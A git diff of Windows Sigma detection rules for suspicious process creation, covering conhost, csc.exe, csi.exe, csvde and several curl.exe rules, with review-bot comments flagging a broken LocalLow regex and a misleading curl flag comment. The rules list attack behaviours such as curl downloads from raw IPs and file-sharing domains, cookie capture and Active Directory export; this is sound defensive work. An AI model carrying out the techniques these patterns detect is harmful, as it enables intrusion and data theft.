+++ b/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml
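Review bot: `filter_main_null` now reads `NewProcessName:` with no value where the old side had `NewProcessName: null`. YAML loads both as null, so matching is unchanged, but the bare key looks like an unfinished entry, especially right next to `filter_main_empty: NewProcessName: ''`, which is deliberately a different case. Keeping the explicit `null`, or at least writing `NewProcessName: # null, i.e. the field is absent` on that line, preserves the intent for readers; the same applies wherever the converter emits this form.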
@@ -1,9 +1,7 @@ title: Conhost Spawned By Uncommon Parent Process id: cbb9e3d1-2386-4e59-912e-62f1484f7a89 status: experimental -description: Detects when the Console Window Host (conhost.exe) process is spawned - by an uncommon parent process, which could be indicative of potential code injection - activity. +description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. references: - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html author: Tim Rauch @@ -20,9 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \conhost.exe + NewProcessName|endswith: \conhost.exe ParentProcessName|endswith: - \explorer.exe + # - '\csrss.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe + # - '\ctfmon.exe' # Seen several times in a testing environment + # - '\dllhost.exe' # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p' - \lsass.exe - \regsvr32.exe - \rundll32.exe @@ -31,6 +32,7 @@ detection: - \spoolsv.exe - \svchost.exe - \userinit.exe + # - '\wermgr.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe - \wininit.exe - \winlogon.exe filter_main_svchost: @@ -49,8 +51,7 @@ detection: ParentCommandLine|contains: - C:\Program Files (x86)\Dropbox\Client\ - C:\Program Files\Dropbox\Client\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml b/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml index 73007fa41..8156ebe99 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml +++ b/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml @@ -21,26 +21,25 @@ detection: EventID: 4688 Channel: Security selection_reg_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - CurrentVersion\Control Panel\CPLs selection_cpl: - CommandLine|endswith: .cpl + CommandLine|endswith: .cpl filter_cpl_sys: - CommandLine|contains: + CommandLine|contains: - \System32\ - '%System%' - '|C:\Windows\system32|' filter_cpl_igfx: - CommandLine|contains|all: + CommandLine|contains|all: - 'regsvr32 ' - ' /s ' - igfxCPL.cpl - condition: process_creation and (all of selection_reg_* or (selection_cpl and - not 1 of filter_cpl_*)) + condition: process_creation and (all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml index f5c72e4b5..b87403ebe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml @@ -1,8 +1,8 @@ title: CreateDump Process Dump id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 related: - - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e - type: similar + - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e + type: similar status: test description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory references: 
@@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \createdump.exe - - OriginalFileName: FX_VER_INTERNALNAME_STR + - NewProcessName|endswith: \createdump.exe + - OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - CommandLine|contains: - - ' -u ' + CommandLine|contains: + - ' -u ' # Short version of '--full' - ' --full ' - - ' -f ' + - ' -f ' # Short version of '--name' - ' --name ' - '.dmp ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml b/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml index 9927c603d..bda01d8dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml @@ -1,8 +1,7 @@ title: Dynamic .NET Compilation Via Csc.EXE id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 status: test -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf 
@@ -23,33 +22,34 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \csc.exe + NewProcessName|endswith: \csc.exe selection_susp_location_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # User execution - \Temporary Internet - - \Windows\Temp\ + - \Windows\Temp\ # Admin execution selection_susp_location_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ - - CommandLine|contains|all: - - :\Users\ - - \Pictures\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Pictures\ selection_susp_location_3: - CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentProcessName|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: ParentProcessName: C:\Windows\System32\sdiagnhost.exe filter_main_w3p: 
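Review bot: The regex in `selection_susp_location_3` contains `([Ll]ocal(Ll]ow)?|[Rr]oaming)`, where `(Ll]ow)?` is an optional group matching the literal text `Ll]ow` rather than the `[Ll]ow` character class that was evidently intended, so a path under `\AppData\LocalLow\<file>` is never matched by this selection; the same string is on the removed line, so the gap is pre-existing and this commit only re-indents it. The intended line is presumably `CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$`. The identical pattern appears in `selection_parent_susp_location` of proc_creation_win_csc_susp_parent.yml two hunks further down and needs the same one-character fix. Since these files are generated from upstream Sigma, it is worth checking whether the bracket was lost in the conversion step or is already missing upstream, so the fix lands in the right place.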
@@ -57,15 +57,16 @@ detection: filter_optional_chocolatey: ParentProcessName: C:\ProgramData\chocolatey\choco.exe filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_susp_location_* - and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 diff --git a/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml index 078b473e0..5f21ac5b9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml @@ -1,14 +1,12 @@ title: Csc.EXE Execution Form Potentially Suspicious Parent id: b730a276-6b63-41b8-bcf8-55930c8fc6ee status: test -description: Detects a potentially suspicious parent of "csc.exe", which could be - a sign of payload delivery. +description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. references: - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - https://reaqta.com/2017/11/short-journey-darkvnc/ - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - X__Junior (Nextron Systems) +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) date: 2019/02/11 modified: 2023/10/27 tags: @@ -26,8 +24,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \csc.exe - - OriginalFileName: csc.exe + - NewProcessName|endswith: \csc.exe + - OriginalFileName: csc.exe selection_parent_generic: ParentProcessName|endswith: - \cscript.exe 
@@ -46,28 +44,29 @@ detection: - \powershell.exe - \pwsh.exe selection_parent_susp_location: - - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ - - ParentCommandLine|contains: - - :\PerfLogs\ - - :\Users\Public\ - - :\Windows\Temp\ - - \Temporary Internet - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Pictures\ + - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + - ParentCommandLine|contains: + - :\PerfLogs\ + - :\Users\Public\ + - :\Windows\Temp\ + - \Temporary Internet + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Pictures\ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentProcessName|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: ParentProcessName: C:\Windows\System32\sdiagnhost.exe filter_main_w3p: 
@@ -75,15 +74,16 @@ detection: filter_optional_chocolatey: ParentProcessName: C:\ProgramData\chocolatey\choco.exe filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_parent_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml b/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml index 1a1a0cc5a..a54d63b04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml 
@@ -1,11 +1,7 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e status: test -description: "Csi.exe is a signed binary from Microsoft that comes with Visual Studio\ - \ and provides C# interactive capabilities. It can be used to run C# code from\ - \ a file passed as a parameter in command line. Early version of this utility\ - \ provided with Microsoft \u201CRoslyn\u201D Community Technology Preview was\ - \ named 'rcsi.exe'" +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/ @@ -27,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \csi.exe - - \rcsi.exe - - OriginalFileName: - - csi.exe - - rcsi.exe + - NewProcessName|endswith: + - \csi.exe + - \rcsi.exe + - OriginalFileName: + - csi.exe + - rcsi.exe selection_cli: Company: Microsoft Corporation condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml b/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml index dce32a6e3..0a5842e15 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml 
@@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Csvde.EXE id: e5d36acd-acb4-4c6f-a13f-9eb203d50099 status: experimental -description: Detects the execution of "csvde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. references: - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \csvde.exe - - OriginalFileName: csvde.exe + - NewProcessName|endswith: \csvde.exe + - OriginalFileName: csvde.exe selection_remote: - CommandLine|contains: ' -f' + CommandLine|contains: ' -f' filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml index 953bf130c..f211b5a4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -1,8 +1,7 @@ title: Potential Cookies Session Hijacking id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 status: experimental -description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie - data. +description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -17,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-c\s - - CommandLine|contains: --cookie-jar + - CommandLine|re: \s-c\s + - CommandLine|contains: --cookie-jar condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml b/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml index a35767084..d914c3e70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml @@ -1,9 +1,7 @@ title: Curl Web Request With Potential Custom User-Agent id: 85de1f22-d189-44e4-8239-dc276b45379b status: experimental -description: Detects execution of "curl.exe" with a potential custom "User-Agent". - Attackers can leverage this to download or exfiltrate data via "curl" to a domain - that only accept specific "User-Agent" strings +description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv 
@@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_header: - CommandLine|re: \s-H\s - CommandLine|contains: 'User-Agent:' + CommandLine|re: \s-H\s # Must be Regex as the flag needs to be case sensitive + CommandLine|contains: 'User-Agent:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index 349f31c38..a70b92b70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -1,8 +1,8 @@ title: File Download From IP URL Via Curl.EXE id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 related: - - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 - type: similar + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + type: similar status: experimental description: Detects file downloads directly from IP address URL using curl.exe references: 
@@ -21,19 +21,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output filter_main_ext: - CommandLine|endswith: + # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 938f0ec05..72efb2ff2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Curl.EXE id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using curl.exe +description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv 
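Review bot: The new comment on `' -O'` in `selection_flag` says it covers the alias for both `--remote-name` and `--output`, but `-O` is the short form of `--remote-name` only; `--output` is `-o`, and the entry catches it only because Sigma's `contains` matching is case-insensitive. A more precise comment would be `# -O (--remote-name); also matches -o (--output) because contains is case-insensitive`. The same comment is repeated in the `selection_flag` of proc_creation_win_curl_download_direct_ip_susp_extensions.yml and proc_creation_win_curl_download_susp_file_sharing_domains.yml in the following hunks.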
@@ -19,19 +18,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index d466c1dfe..0dfa95f6a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Curl.EXE id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb status: experimental -description: Detects potentially suspicious file download from file sharing domains - using curl.exe +description: Detects potentially suspicious file download from file sharing domains using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv 
@@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -48,14 +47,14 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml index 637884a31..8a7486c19 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -16,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-k\s - - CommandLine|contains: --insecure + - CommandLine|re: \s-k\s + - CommandLine|contains: --insecure condition: process_creation and (all of selection_*) falsepositives: - Access to badly maintained internal or development systems diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml index 51515e3d2..47c4809a3 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml @@ -1,8 +1,7 @@ title: Insecure Proxy/DOH Transfer Via Curl.EXE id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 status: experimental -description: Detects execution of "curl.exe" with the "insecure" flag over proxy or - DOH. +description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --doh-insecure - --proxy-insecure condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml b/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml index 342cde3c5..5b2cd3db7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml @@ -1,8 +1,7 @@ title: Local File Read Using Curl.EXE id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 status: experimental -description: Detects execution of "curl.exe" with the "file://" protocol handler in - order to read local files. +description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) 
@@ -17,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: file:/// + CommandLine|contains: file:/// condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml b/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml index 86008bca0..278c15944 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml @@ -1,13 +1,12 @@ title: Suspicious Curl.EXE Download id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: 9a517fca-4ba3-4629-9278-a68694697b81 - type: similar + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download + type: similar status: test -description: Detects a suspicious curl process start on Windows and outputs the requested - document to a local file +description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file references: - https://twitter.com/max_mal_/status/1542461200797163522 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 @@ -28,10 +27,10 @@ detection: EventID: 4688 Channel: Security selection_curl: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%Public%' - '%Temp%' 
